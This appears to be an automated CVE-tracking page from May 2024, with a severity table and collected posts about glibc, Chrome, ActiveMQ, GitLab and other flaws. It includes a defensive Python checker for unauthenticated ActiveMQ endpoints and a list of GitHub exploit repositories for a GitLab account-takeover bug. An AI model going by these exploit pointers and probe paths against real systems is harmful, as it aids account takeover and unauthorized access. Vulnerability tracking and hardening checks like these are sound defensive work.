##
Updated at UTC 2024-05-04T13:12:21.798812
CVE | CVSS | EPSS | Posts | Repos | Nuclei | Updated | Description |
---|---|---|---|---|---|---|---|
CVE-2024-2961 | None | 0.04% | 13 | 1 |  | 2024-05-04T03:30:45 | The iconv() function in the GNU C Library versions 2.39 and older may overflow t |
CVE-2024-4368 | 0 | 0.04% | 4 | 0 |  | 2024-05-04T02:15:06.853000 | Use after free in Dawn in Google Chrome prior to 124.0.6367.118 allowed a remote |
CVE-2024-4331 | 0 | 0.04% | 4 | 0 |  | 2024-05-04T02:15:06.800000 | Use after free in Picture In Picture in Google Chrome prior to 124.0.6367.118 al |
CVE-2024-32114 | 8.5 | 0.04% | 2 | 0 |  | 2024-05-03T17:47:08 | In Apache ActiveMQ 6.x, the default configuration doesn't secure the API web con |
CVE-2024-4060 | 0 | 0.04% | 1 | 0 |  | 2024-05-03T04:15:09.620000 | Use after free in Dawn in Google Chrome prior to 124.0.6367.78 allowed a remote |
CVE-2024-4059 | 0 | 0.04% | 1 | 0 |  | 2024-05-03T03:16:29.430000 | Out of bounds read in V8 API in Google Chrome prior to 124.0.6367.78 allowed a r |
CVE-2024-4058 | 0 | 0.04% | 1 | 0 |  | 2024-05-03T03:16:29.387000 | Type confusion in ANGLE in Google Chrome prior to 124.0.6367.78 allowed a remote |
CVE-2023-48795 | 5.9 | 96.23% | 2 | 1 | template | 2024-05-02T13:18:40 | ### Summary Terrapin is a prefix truncation attack targeting the SSH protocol. |
CVE-2023-7028 | 7.5 | 95.38% | 8 | 11 | template | 2024-05-02T01:00:01.640000 | An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 pr |
CVE-2024-29011 | 7.5 | 0.04% | 4 | 0 |  | 2024-05-01T21:30:46 | Use of hard-coded password in the GMS ECM endpoint leading to authentication byp |
CVE-2024-26305 | 9.8 | 0.04% | 12 | 0 |  | 2024-05-01T19:50:25.633000 | There is a buffer overflow vulnerability in the underlying Utility daemon that c |
CVE-2024-20357 | 5.9 | 0.04% | 4 | 0 |  | 2024-05-01T19:50:25.633000 | A vulnerability in the XML service of Cisco IP Phone firmware could allow an una |
CVE-2024-20376 | 7.5 | 0.04% | 4 | 0 |  | 2024-05-01T18:31:25 | A vulnerability in the web-based management interface of Cisco IP Phone firmware |
CVE-2024-29010 | 7.1 | 0.04% | 4 | 0 |  | 2024-05-01T18:31:20 | The XML document processed in the GMS ECM URL endpoint is vulnerable to XML exte |
CVE-2024-20378 | 7.5 | 0.04% | 4 | 0 |  | 2024-05-01T18:31:19 | A vulnerability in the web-based management interface of Cisco IP Phone firmware |
CVE-2024-32462 | 8.4 | 0.04% | 2 | 0 |  | 2024-05-01T18:15:24.140000 | Flatpak is a system for building, distributing, and running sandboxed desktop ap |
CVE-2024-1086 | 7.8 | 0.04% | 1 | 3 |  | 2024-05-01T18:15:13.200000 | A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables compon |
CVE-2024-33511 | 9.8 | 0.04% | 8 | 0 |  | 2024-05-01T15:30:44 | There is a buffer overflow vulnerability in the underlying Automatic Reporting s |
CVE-2024-33512 | 9.8 | 0.04% | 4 | 0 |  | 2024-05-01T15:30:44 | There is a buffer overflow vulnerability in the underlying Local User Authentica |
CVE-2024-26304 | 9.8 | 0.04% | 2 | 1 |  | 2024-05-01T15:30:37 | There is a buffer overflow vulnerability in the underlying L2/L3 Management serv |
CVE-2024-27322 | 8.8 | 0.04% | 28 | 0 |  | 2024-04-29T21:30:34 | Deserialization of untrusted data can occur in the R statistical programming lan |
CVE-2024-27956 | 9.9 | 0.05% | 1 | 3 | template | 2024-04-29T09:31:52 | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injecti |
CVE-2024-27124 | 7.5 | 0.04% | 2 | 0 |  | 2024-04-26T15:32:22.523000 | An OS command injection vulnerability has been reported to affect several QNAP o |
CVE-2024-32764 | 9.9 | 0.04% | 2 | 0 |  | 2024-04-26T15:32:22.523000 | A missing authentication for critical function vulnerability has been reported t |
CVE-2024-32766 | 10.0 | 0.04% | 2 | 1 |  | 2024-04-26T15:30:39 | An OS command injection vulnerability has been reported to affect several QNAP o |
CVE-2024-4040 | 10.0 | 1.60% | 27 | 9 |  | 2024-04-26T15:25:47.270000 | A server side template injection vulnerability in CrushFTP in all versions befor |
CVE-2024-20359 | 6.0 | 0.13% | 54 | 2 |  | 2024-04-26T15:25:02.773000 | A vulnerability in a legacy capability that allowed for the preloading of VPN cl |
CVE-2024-20353 | 8.6 | 0.35% | 52 | 2 |  | 2024-04-26T15:22:27.803000 | A vulnerability in the management and VPN web servers for Cisco Adaptive Securit |
CVE-2024-4006 | 4.3 | 0.04% | 2 | 0 |  | 2024-04-25T17:25:05.903000 | An issue has been discovered in GitLab CE/EE affecting all versions starting fro |
CVE-2024-4024 | 7.3 | 0.04% | 2 | 0 |  | 2024-04-25T15:30:38 | An issue has been discovered in GitLab CE/EE affecting all versions starting fro |
CVE-2024-2434 | 8.5 | 0.04% | 2 | 0 |  | 2024-04-25T13:18:02.660000 | An issue has been discovered in GitLab affecting all versions of GitLab CE/EE 1 |
CVE-2024-1347 | 4.3 | 0.04% | 2 | 0 |  | 2024-04-25T12:30:56 | An issue has been discovered in GitLab CE/EE affecting all versions before 16.9. |
CVE-2024-2829 | 7.5 | 0.04% | 2 | 0 |  | 2024-04-25T12:30:51 | An issue has been discovered in GitLab CE/EE affecting all versions starting fro |
CVE-2024-20358 | 6.0 | 0.04% | 4 | 0 |  | 2024-04-24T21:31:56 | A vulnerability in the Cisco Adaptive Security Appliance (ASA) restore functiona |
CVE-2024-20356 | 8.7 | 0.04% | 6 | 1 |  | 2024-04-24T21:31:56 | A vulnerability in the web-based management interface of Cisco Integrated Manage |
CVE-2024-3400 | 10.0 | 95.36% | 39 | 33 | template | 2024-04-23T19:57:25.207000 | A command injection as a result of arbitrary file creation vulnerability in the |
CVE-2024-29003 | 7.5 | 0.04% | 1 | 0 |  | 2024-04-23T15:30:35 | The SolarWinds Platform was susceptible to a XSS vulnerability that affects the |
CVE-2024-1480 | 7.5 | 0.04% | 4 | 0 |  | 2024-04-22T13:28:43.747000 | Unitronics Vision Standard line of controllers allow the Information Mode passwo |
CVE-2024-28076 | 7.0 | 0.07% | 2 | 0 |  | 2024-04-19T14:15:11.080000 | The SolarWinds Platform was susceptible to a Arbitrary Open Redirection Vulnerab |
CVE-2024-29001 | 7.5 | 0.04% | 1 | 0 |  | 2024-04-18T09:30:53 | A SolarWinds Platform SWQL Injection Vulnerability was identified in the user in |
CVE-2024-28073 | 8.5 | 0.04% | 1 | 0 |  | 2024-04-17T18:31:37 | SolarWinds Serv-U was found to be susceptible to a Directory Traversal Remote Co |
CVE-2024-22354 | 7.0 | 0.04% | 2 | 0 |  | 2024-04-17T03:30:48 | IBM WebSphere Application Server 8.5, 9.0 and IBM WebSphere Application Server |
CVE-2024-21111 | 7.8 | 0.04% | 4 | 1 |  | 2024-04-17T00:31:31 | Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (comp |
CVE-2024-31497 | None | 0.05% | 4 | 2 |  | 2024-04-17T00:31:29 | In PuTTY 0.68 through 0.80 before 0.81, biased ECDSA nonce generation allows an |
CVE-2024-1135 | 8.2 | 0.04% | 2 | 0 |  | 2024-04-16T23:24:40 | Gunicorn fails to properly validate Transfer-Encoding headers, leading to HTTP R |
CVE-2024-3272 | 9.8 | 1.27% | 4 | 1 |  | 2024-04-15T20:14:55.570000 | ** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as very cr |
CVE-2024-2279 | 8.7 | 0.04% | 2 | 0 |  | 2024-04-12T03:30:44 | An issue has been discovered in GitLab CE/EE affecting all versions starting fro |
CVE-2024-3651 | 6.2 | 0.00% | 2 | 0 |  | 2024-04-11T21:32:40 | ### Impact A specially crafted argument to the `idna.encode()` function could co |
CVE-2024-26198 | 8.8 | 0.53% | 2 | 0 |  | 2024-04-11T21:30:50 | Microsoft Exchange Server Remote Code Execution Vulnerability |
CVE-2023-41266 | 8.2 | 85.11% | 2 | 1 | template | 2024-04-11T21:06:16 | A path traversal vulnerability found in Qlik Sense Enterprise for Windows for ve |
CVE-2024-2604 | 6.3 | 0.04% | 4 | 0 |  | 2024-04-11T01:25:29.777000 | A vulnerability was found in SourceCodester File Manager App 1.0. It has been de |
CVE-2024-26218 | 7.8 | 0.04% | 6 | 1 |  | 2024-04-10T13:24:00.070000 | Windows Kernel Elevation of Privilege Vulnerability |
CVE-2024-2957 | 7.2 | 0.04% | 2 | 0 |  | 2024-04-09T21:32:08 | The Simple Ajax Chat – Add a Fast, Secure Chat Box plugin for WordPress is vulne |
CVE-2024-29988 | 8.8 | 0.46% | 2 | 1 |  | 2024-04-09T18:30:28 | SmartScreen Prompt Security Feature Bypass Vulnerability |
CVE-2023-42931 | 7.8 | 0.04% | 2 | 1 |  | 2024-04-08T22:47:13.533000 | The issue was addressed with improved checks. This issue is fixed in macOS Ventu |
CVE-2024-3273 | 7.3 | 83.36% | 2 | 8 | template | 2024-04-07T15:30:32 | A vulnerability, which was classified as critical, was found in D-Link DNS-320L, |
CVE-2023-41265 | 9.6 | 87.59% | 2 | 1 | template | 2024-04-04T07:16:03 | An HTTP Request Tunneling vulnerability found in Qlik Sense Enterprise for Windo |
CVE-2023-34362 | 9.8 | 95.56% | 2 | 9 | template | 2024-04-04T04:29:06 | In Progress MOVEit Transfer before 2021.0.6 (13.0.6), 2021.1.4 (13.1.4), 2022.0. |
CVE-2023-24932 | 6.7 | 13.87% | 2 | 1 |  | 2024-04-04T03:56:20 | Secure Boot Security Feature Bypass Vulnerability |
CVE-2023-24796 | 9.8 | 0.33% | 2 | 0 |  | 2024-04-04T03:41:35 | Password vulnerability found in Vinga WR-AC1200 81.102.1.4370 and before allows |
CVE-2024-2389 | 10.0 | 0.44% | 15 | 26 | template | 2024-04-02T15:30:43 | In Flowmon versions prior to 11.1.14 and 12.3.5, an operating system command inj |
CVE-2023-44487 | 5.3 | 73.93% | 2 | 12 |  | 2024-04-01T16:13:53 | ## HTTP/2 Rapid reset attack The HTTP/2 protocol allows clients to indicate to t |
CVE-2024-3128 | 2.4 | 0.04% | 1 | 0 |  | 2024-04-01T15:30:38 | ** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as problem |
CVE-2024-3094 | 10.0 | 10.08% | 5 | 60 | template | 2024-03-29T18:30:50 | Malicious code was discovered in the upstream tarballs of xz, starting with vers |
CVE-2024-2887 | None | 0.04% | 4 | 0 |  | 2024-03-29T06:30:30 | Type Confusion in WebAssembly in Google Chrome prior to 123.0.6312.86 allowed a |
CVE-2023-48788 | 9.8 | 56.22% | 4 | 1 |  | 2024-03-26T01:00:02.003000 | A improper neutralization of special elements used in an sql command ('sql injec |
CVE-2024-27198 | 9.8 | 97.24% | 2 | 9 | template | 2024-03-21T05:01:12 | In JetBrains TeamCity before 2023.11.4 authentication bypass allowing to perform |
CVE-2024-21899 | 9.8 | 0.09% | 2 | 0 |  | 2024-03-13T14:25:02.043000 | An improper authentication vulnerability has been reported to affect several QNA |
CVE-2024-21901 | 4.7 | 0.04% | 2 | 0 |  | 2024-03-08T18:30:35 | A SQL injection vulnerability has been reported to affect myQNAPcloud. If exploi |
CVE-2024-21900 | 4.3 | 0.05% | 2 | 0 |  | 2024-03-08T18:30:35 | An injection vulnerability has been reported to affect several QNAP operating sy |
CVE-2024-20345 | 6.5 | 0.04% | 2 | 0 |  | 2024-03-07T13:52:27.110000 | A vulnerability in the file upload functionality of Cisco AppDynamics Controller |
CVE-2024-1708 | 8.5 | 0.05% | 2 | 2 |  | 2024-02-22T15:30:39 | ConnectWise ScreenConnect 23.9.7 and prior are affected by path-traversal vulner |
CVE-2024-1212 | 10.0 | 0.21% | 4 | 1 | template | 2024-02-21T18:31:06 | Unauthenticated remote attackers can access the system through the LoadMaster ma |
CVE-2023-50386 | 8.8 | 87.24% | 2 | 1 |  | 2024-02-15T18:40:48.837000 | Improper Control of Dynamically-Managed Code Resources, Unrestricted Upload of F |
CVE-2024-21893 | 8.2 | 96.30% | 2 | 4 | template | 2024-02-09T05:11:32 | A server-side request forgery vulnerability in the SAML component of Ivanti Conn |
CVE-2023-20198 | 10.0 | 87.33% | 2 | 28 | template | 2024-02-03T05:07:29 | Cisco is aware of active exploitation of a previously unknown vulnerability in t |
CVE-2024-0204 | 9.8 | 53.86% | 2 | 6 | template | 2024-02-02T18:30:29 | Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauth |
CVE-2024-21887 | 9.1 | 97.33% | 2 | 12 | template | 2024-01-22T17:15:09.523000 | A command injection vulnerability in web components of Ivanti Connect Secure (9. |
CVE-2023-46805 | 8.2 | 96.56% | 2 | 8 | template | 2024-01-22T17:15:09.080000 | An authentication bypass vulnerability in the web component of Ivanti ICS 9.x, 2 |
CVE-2021-26887 | 7.8 | 0.06% | 2 | 0 |  | 2023-12-29T20:15:55.393000 | An elevation of privilege vulnerability exists in Microsoft Windows when Fold |
CVE-2023-6448 | 9.8 | 6.84% | 2 | 0 |  | 2023-12-19T15:30:29 | Unitronics Vision Series PLCs and HMIs use default administrative passwords. An |
CVE-2023-48365 | 9.6 | 0.08% | 2 | 0 |  | 2023-12-08T05:05:23 | Qlik Sense Enterprise for Windows before August 2023 Patch 2 allows unauthentica |
CVE-2023-4474 | 9.8 | 0.10% | 5 | 0 |  | 2023-12-06T02:15:07.187000 | The improper neutralization of special elements in the WSGI server of the Zyxel |
CVE-2023-4473 | 9.8 | 0.07% | 5 | 0 |  | 2023-12-06T02:15:07.063000 | A command injection vulnerability in the web server of the Zyxel NAS326 firmware |
CVE-2023-46604 | 10.0 | 97.27% | 2 | 26 | template | 2023-11-28T22:24:39 | Apache ActiveMQ is vulnerable to Remote Code Execution.The vulnerability may all |
CVE-2023-36396 | 7.8 | 0.11% | 2 | 0 |  | 2023-11-20T18:04:21.453000 | Windows Compressed Folder Remote Code Execution Vulnerability |
CVE-2021-44228 | 10.0 | 97.56% | 2 | 100 | template | 2023-11-07T03:39:36.897000 | Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12 |
CVE-2014-0160 | 7.5 | 97.48% | 2 | 65 |  | 2023-11-07T02:18:10.590000 | The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not p |
CVE-2020-29583 | 9.8 | 96.25% | 2 | 1 | template | 2023-11-05T05:04:43 | Firmware version 4.60 of Zyxel USG devices contains an undocumented account (zyf |
CVE-2023-38831 | 7.8 | 35.46% | 4 | 43 |  | 2023-10-23T01:15:07.550000 | RARLAB WinRAR before 6.23 allows attackers to execute arbitrary code when a user |
CVE-2020-3259 | 7.5 | 1.93% | 2 | 0 |  | 2023-08-16T18:30:19 | A vulnerability in the web services interface of Cisco Adaptive Security Applian |
CVE-2023-1389 | 8.8 | 6.88% | 1 | 2 |  | 2023-08-11T15:15:09.760000 | TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 Build 20230219 conta |
CVE-2021-26085 | 5.3 | 96.32% | 4 | 2 | template | 2023-08-08T14:22:24.967000 | Affected versions of Atlassian Confluence Server allow remote attackers to view |
CVE-2023-32054 | 7.3 | 0.04% | 2 | 0 |  | 2023-07-13T19:55:55.293000 | Volume Shadow Copy Elevation of Privilege Vulnerability |
CVE-2023-21746 | 7.8 | 0.04% | 2 | 1 |  | 2023-04-27T19:15:14.917000 | Windows NTLM Elevation of Privilege Vulnerability |
CVE-2015-2051 | 0 | 97.14% | 6 | 0 |  | 2023-04-26T19:27:52.350000 | The D-Link DIR-645 Wired/Wireless Router Rev. Ax with firmware 1.04b12 and earli |
CVE-2022-37955 | 7.8 | 0.06% | 2 | 0 |  | 2023-04-11T21:15:13.240000 | Windows Group Policy Elevation of Privilege Vulnerability |
CVE-2023-21036 | 5.5 | 0.04% | 1 | 6 |  | 2023-04-06T05:08:38 | In BitmapExport.java, there is a possible failure to truncate images due to a lo |
CVE-2023-23397 | 9.8 | 92.64% | 4 | 29 |  | 2023-03-29T05:07:23 | Microsoft Outlook Elevation of Privilege Vulnerability |
CVE-2022-38028 | 7.8 | 0.05% | 15 | 0 |  | 2023-02-03T05:02:37 | Windows Print Spooler Elevation of Privilege Vulnerability. |
CVE-2017-8570 | 7.8 | 97.34% | 4 | 9 |  | 2023-02-02T05:01:39 | Microsoft Office allows a remote code execution vulnerability due to the way tha |
CVE-2021-3129 | 9.8 | 97.46% | 2 | 28 | template | 2023-02-01T05:05:19 | Ignition before 2.5.2, as used in Laravel and other products, allows unauthentic |
CVE-2006-4304 | None | 6.64% | 4 | 0 |  | 2023-02-01T05:01:22 | Buffer overflow in the sppp driver in FreeBSD 4.11 through 6.1, NetBSD 2.0 throu |
CVE-2020-8657 | None | 16.36% | 2 | 0 |  | 2023-01-29T05:01:16 | An issue was discovered in EyesOfNetwork 5.3. The installation uses the same API |
CVE-2022-26138 | 9.8 | 97.21% | 2 | 4 | template | 2023-01-27T05:06:26 | The Atlassian Questions For Confluence app for Confluence Server and Data Center |
CVE-2021-21975 | 7.5 | 97.40% | 4 | 10 | template | 2022-02-01T17:45:43.750000 | Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975) |
CVE-2018-13379 | 9.8 | 97.41% | 4 | 12 | template | 2021-06-03T11:15:08.307000 | An Improper Limitation of a Pathname to a Restricted Directory ("Path Traversal" |
CVE-2024-28189 | 0 | 0.04% | 6 | 0 |  | N/A |  |
CVE-2024-29021 | 0 | 0.04% | 6 | 0 |  | N/A |  |
CVE-2024-33599 | 0 | 0.00% | 8 | 0 |  | N/A |  |
CVE-2024-33600 | 0 | 0.00% | 8 | 0 |  | N/A |  |
CVE-2024-33601 | 0 | 0.00% | 8 | 0 |  | N/A |  |
CVE-2024-33602 | 0 | 0.00% | 8 | 0 |  | N/A |  |
CVE-2024-28185 | 0 | 0.04% | 4 | 0 |  | N/A |  |
CVE-2023-3824 | 0 | 0.08% | 2 | 2 |  | N/A |  |
CVE-2024-202353 | 0 | 0.00% | 2 | 0 |  | N/A |  |
CVE-2024-202359 | 0 | 0.00% | 2 | 0 |  | N/A |  |
CVE-2024-27282 | 0 | 0.00% | 3 | 0 |  | N/A |  |
CVE-2024-32657 | 0 | 0.04% | 2 | 0 |  | N/A |  |
CVE-2023-42757 | 0 | 0.00% | 2 | 0 |  | N/A |  |
##updated 2024-05-04T03:30:45
13 posts
1 repos
CVE-2024-2961 - glibc Vulnerability Opens Door to PHP Attacks: Patch Immediately https://securityonline.info/cve-2024-2961-glibc-vulnerability-opens-door-to-php-attacks-patch-immediately/
##glibc iconv buffer overflow vulnerability that can be used for remote code execution on servers running PHP. Present for 24 years. This is the kind of stuff Rust was made for.
- https://www.openwall.com/lists/oss-security/2024/04/18/4
- https://nvd.nist.gov/vuln/detail/CVE-2024-2961
- https://rockylinux.org/news/glibc-vulnerability-april-2024/
A vulnerability (CVE-2024-2961) that may affect PHP applications is receiving patches on many operating systems. It's advised to update & restart your systems where patches are available.
Ubuntu/Debian/Fedora appear to have patches available for supported systems. Rocky has some checking/workaround guidance here:
##There is a new PHP vulnerability out. It is being tracked as CVE-2024-2961. Here’s a video explaining the vulnerability https://youtu.be/u8jLUjpCWrs?si=Fm1JSBdAW9VBzuhj #cve #vulnerability #hacking #php #linux #news #Security
##tl;dr: upgrade glibc on your servers!
Summing it up, there's a vulnerability (CVE-2024-2961) on glibc that, apparently, can be used to get RCE on servers running PHP.
It's recommended that you update glibc to a patched version.
https://security-tracker.debian.org/tracker/CVE-2024-2961
https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2024-2961
There's an upcoming talk on May 10 where the researcher will explain how it was used to hack PHP servers.
##@ramsey it's this one CVE-2024-2961 https://security-tracker.debian.org/tracker/CVE-2024-2961
##"No way to prevent this" say users of only language where this regularly happens
https://xeiaso.net/shitposts/no-way-to-prevent-this/CVE-2024-2961/
##updated 2024-05-04T02:15:06.853000
4 posts
Google Chrome security advisory: Stable Channel Update for Desktop
2 vulnerabilities, both externally reported. No mention of exploitation.
#Chrome #Google #vulnerability #PatchTuesday #CVE_2024_4331 #CVE_2024_4368
##updated 2024-05-04T02:15:06.800000
4 posts
Google Chrome security advisory: Stable Channel Update for Desktop
2 vulnerabilities, both externally reported. No mention of exploitation.
#Chrome #Google #vulnerability #PatchTuesday #CVE_2024_4331 #CVE_2024_4368
##updated 2024-05-03T17:47:08
2 posts
Apache ActiveMQ security advisory: CVE-2024-32114 - Jolokia and REST API were not secured with default configuration
CVE-2024-32114 (8.5 high) Insecure Default Initialization of Resource (Jolokia JMX REST API and the Message REST API). A malicious actor could interact with the broker using the Jolokia JMX REST API, or produce/consume messages or purge/delete destinations using the Message REST API. The impact of CVE-2024-32114 is unauthorized data access, data loss, or service disruption, severely compromising the application's integrity and availability. Fixed in Apache ActiveMQ 6.1.2. Mitigation is to update the default conf/jetty.xml configuration file to add an authentication requirement (see advisory for details)
See SOCRadar blog post New High-Severity Vulnerability in Apache ActiveMQ Poses Risk of Unauthorized Access: CVE-2024-32114
Why you should care about CVE-2024-32114:
A previous Apache ActiveMQ vulnerability CVE-2023-46604 (rated 10.0 maximum severity, disclosed 27 October 2023 by Apache) was exploited almost immediately and added to CISA's KEV Catalog on 02 November 2023 (within 5 days). It is known to be exploited by ransomware groups.
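The post above says the mitigation for CVE-2024-32114 is to make conf/jetty.xml require authentication for the Jolokia and Message REST APIs. The check below is an added example, not code from the ActiveMQ project or from the post: it parses a jetty.xml, collects every Jetty `pathSpec` that is mapped to a `Constraint` bean with `authenticate=true`, and reports which of a few probe paths would still be served without credentials. The two sample documents are constructed for this example and are an assumption about the file's shape (Spring beans, a `Constraint` bean referenced by `ConstraintMapping` beans), not copies of the shipped configuration; the probe paths are likewise assumed.

```python
"""Flag ActiveMQ web endpoints that a conf/jetty.xml leaves without authentication.

Added example for the CVE-2024-32114 mitigation; not ActiveMQ project code.
The bean layout below (Constraint + ConstraintMapping with a comma-separated
pathSpec) is an assumption about conf/jetty.xml, and both samples are
constructed for this example.
"""
import xml.etree.ElementTree as ET

# Constructed sample: the constraint only covers the admin console, so the
# Jolokia JMX REST API and the Message REST API under /api/ answer without auth.
WEAK_JETTY_XML = """<beans xmlns="http://www.springframework.org/schema/beans">
  <bean id="securityConstraint" class="org.eclipse.jetty.util.security.Constraint">
    <property name="name" value="BASIC"/>
    <property name="roles" value="user,admin"/>
    <property name="authenticate" value="true"/>
  </bean>
  <bean id="adminSecurityConstraintMapping" class="org.eclipse.jetty.security.ConstraintMapping">
    <property name="constraint" ref="securityConstraint"/>
    <property name="pathSpec" value="/admin/*,*.jsp"/>
  </bean>
</beans>"""

# Constructed sample: the same file with /api/* added to the authenticated pathSpec.
HARDENED_JETTY_XML = WEAK_JETTY_XML.replace(
    'value="/admin/*,*.jsp"', 'value="/api/*,/admin/*,*.jsp"'
)

# Paths a scanner (or an attacker) would try first; assumed for this example.
DEFAULT_PROBES = ("/api/jolokia/version", "/api/message/TEST", "/admin/index.jsp")


def _local(tag):
    """Strip the XML namespace so the code works with or without the Spring xmlns."""
    return tag.rsplit("}", 1)[-1]


def _props(bean):
    """Return {property-name: (value, ref)} for one Spring <bean> element."""
    out = {}
    for child in bean:
        if _local(child.tag) == "property":
            out[child.get("name")] = (child.get("value"), child.get("ref"))
    return out


def path_covered(spec, path):
    """Match one Jetty pathSpec (exact, '/prefix/*' or '*.ext') against a request path."""
    spec = spec.strip()
    if spec.endswith("/*"):
        return path == spec[:-2] or path.startswith(spec[:-1])
    if spec.startswith("*."):
        return path.endswith(spec[1:])
    return path == spec


def authenticated_path_specs(jetty_xml):
    """Collect every pathSpec mapped to a Constraint bean that has authenticate=true."""
    root = ET.fromstring(jetty_xml)
    beans = [el for el in root.iter() if _local(el.tag) == "bean"]
    authenticated = set()
    for bean in beans:
        if bean.get("class", "").endswith(".Constraint"):
            value, _ = _props(bean).get("authenticate", (None, None))
            if (value or "").lower() == "true":
                authenticated.add(bean.get("id"))
    specs = []
    for bean in beans:
        if bean.get("class", "").endswith(".ConstraintMapping"):
            props = _props(bean)
            _, ref = props.get("constraint", (None, None))
            spec, _ = props.get("pathSpec", (None, None))
            if spec and ref in authenticated:
                specs.extend(s.strip() for s in spec.split(","))
    return specs


def unprotected_endpoints(jetty_xml, probes=DEFAULT_PROBES):
    """Return the probe paths that no authenticated constraint mapping covers."""
    specs = authenticated_path_specs(jetty_xml)
    return [p for p in probes if not any(path_covered(s, p) for s in specs)]


if __name__ == "__main__":
    for label, doc in (("weak", WEAK_JETTY_XML), ("hardened", HARDENED_JETTY_XML)):
        gaps = unprotected_endpoints(doc)
        print(label, "->", gaps or "all probes require authentication")
```

Two caveats when using this against a real broker. The pathSpec matcher only handles the three forms the default file uses (exact, `/prefix/*`, `*.ext`); Jetty's own matching is richer, so treat a clean result as a prompt to confirm with an unauthenticated request to `/api/jolokia/version` rather than as proof. And requiring authentication buys little if `conf/jetty-realm.properties` still holds the credentials ActiveMQ ships with; rotate those and, as the advisory says, upgrade to 6.1.2 rather than relying on the configuration edit alone.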
##updated 2024-05-03T04:15:09.620000
1 posts
Google Chrome security advisory: 4 security fixes, 3 externally reported. No mention of exploitation: 🔗 https://chromereleases.googleblog.com/2024/04/stable-channel-update-for-desktop_24.html
#Google #Chrome #vulnerability #PatchTuesday #CVE_2024_4058 #CVE_2024_4059 #CVE_2024_4060
##updated 2024-05-03T03:16:29.430000
1 posts
Google Chrome security advisory: 4 security fixes, 3 externally reported. No mention of exploitation: 🔗 https://chromereleases.googleblog.com/2024/04/stable-channel-update-for-desktop_24.html
#Google #Chrome #vulnerability #PatchTuesday #CVE_2024_4058 #CVE_2024_4059 #CVE_2024_4060
##updated 2024-05-03T03:16:29.387000
1 posts
Google Chrome security advisory: 4 security fixes, 3 externally reported. No mention of exploitation: 🔗 https://chromereleases.googleblog.com/2024/04/stable-channel-update-for-desktop_24.html
#Google #Chrome #vulnerability #PatchTuesday #CVE_2024_4058 #CVE_2024_4059 #CVE_2024_4060
##updated 2024-05-02T13:18:40
2 posts
1 repos
Jenkins security advisory from 17 April 2024 patched against the Terrapin Attack vulnerability CVE-2023-48795 🔗 https://www.jenkins.io/security/advisory/2024-04-17/
##updated 2024-05-02T01:00:01.640000
8 posts
11 repos
https://github.com/yoryio/CVE-2023-7028
https://github.com/thanhlam-attt/CVE-2023-7028
https://github.com/hackeremmen/gitlab-exploit
https://github.com/Trackflaw/CVE-2023-7028-Docker
https://github.com/Vozec/CVE-2023-7028
https://github.com/RandomRobbieBF/CVE-2023-7028
https://github.com/V1lu0/CVE-2023-7028
https://github.com/Esonhugh/gitlab_honeypot
https://github.com/mochammadrafi/CVE-2023-7028
https://github.com/Shimon03/CVE-2023-7028-Account-Take-Over-Gitlab
The U.S. Cybersecurity and Infrastructure Security Agency (#CISA) warns #GitLab users of a 100-day-old, maximum severity vulnerability.
#CVE20237028 has a perfect CVSS score of 10. In #SBBlogwatch, we double-check our versions. At @TechstrongGroup’s @SecurityBlvd: https://securityboulevard.com/2024/05/gitlab-cvss-10-cisa-richixbw/?utm_source=richisoc&utm_medium=social&utm_content=richisoc&utm_campaign=richisoc
##CISA: CISA Adds One Known Exploited Vulnerability to Catalog
HOT OFF THE PRESS! CISA adds CVE-2023-7028 (10.0 critical, disclosed 12 January 2024 by GitLab) GitLab Community and Enterprise Editions Improper Access Control Vulnerability to the Known Exploited Vulnerabilities (KEV) Catalog!
Why you should care about CVE-2023-7028:
This is a zero-click account takeover that people were freaking out about less than 4 months ago. Successful exploitation allows attackers to send password reset emails for a targeted account to an attacker-controlled email address, allowing the threat actor to change the password and take over the account.
cc: @campuscodi @serghei @todb
#kev #eitw #knownexploitedvulnerabilitiescatalog #vulnerability #CVE_2023_7028
##GitLab Password Reset Vulnerability (CVE-2023-7028) https://fortiguard.fortinet.com/threat-signal-report/5433
##Related: "CISA Warns of Active Exploitation of Severe GitLab Password Reset Vulnerability"
"The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical flaw impacting #GitLab to its Known Exploited Vulnerabilities (KEV) catalog, owing to active exploitation in the wild.
Tracked as CVE-2023-7028 (CVSS score: 10.0), the maximum severity vulnerability could facilitate account takeover by sending password reset emails to an unverified email address."
👇
https://thehackernews.com/2024/05/cisa-warns-of-active-exploitation-of.html
# CISA Adds CVE-2023-7028 - #GitLab Community and Enterprise Editions Improper Access Control Vulnerability to Catalog #cybersecurity #infosec https://www.cisa.gov/news-events/alerts/2024/05/01/cisa-adds-one-known-exploited-vulnerability-catalog @cisacyber
##updated 2024-05-01T21:30:46
4 posts
SonicWall security advisory: GMS ECM MULTIPLE VULNERABILITIES
Affected Products: GMS (Virtual Appliance, Windows) - 9.3.4 and earlier versions. Fixed software: 9.4.0 (Build 9.4-9400.1040) and later versions. Not exploited.
#SonicWall #PatchTuesday #vulnerability #SonicWallGMS #CVE_2024_29010 #CVE_2024_29011
##updated 2024-05-01T19:50:25.633000
12 posts
HPE Aruba Networking security advisory: ARUBA-PSA-2024-004 ArubaOS Multiple Vulnerabilities
On 30 April 2024, HPE Aruba Networking released a security advisory, announcing 10 security vulnerabilities and patches for them. 4 vulnerabilities are rated critical:
3 of the other 6 vulnerabilities are 5.9 medium buffer overflow to arbitrary code execution, and the last 3 are 5.3 medium Denial of Service. HPE Aruba Networking recommends upgrading Mobility Controllers, Mobility Conductors and Gateways to one of the following ArubaOS versions (as applicable) to resolve all the vulnerabilities described in the details section:
They are not aware of any public discussion or exploit code targeting these specific vulnerabilities as of the release date of the advisory. See related Bleeping Computer reporting: HPE Aruba Networking fixes four critical RCE flaws in ArubaOS
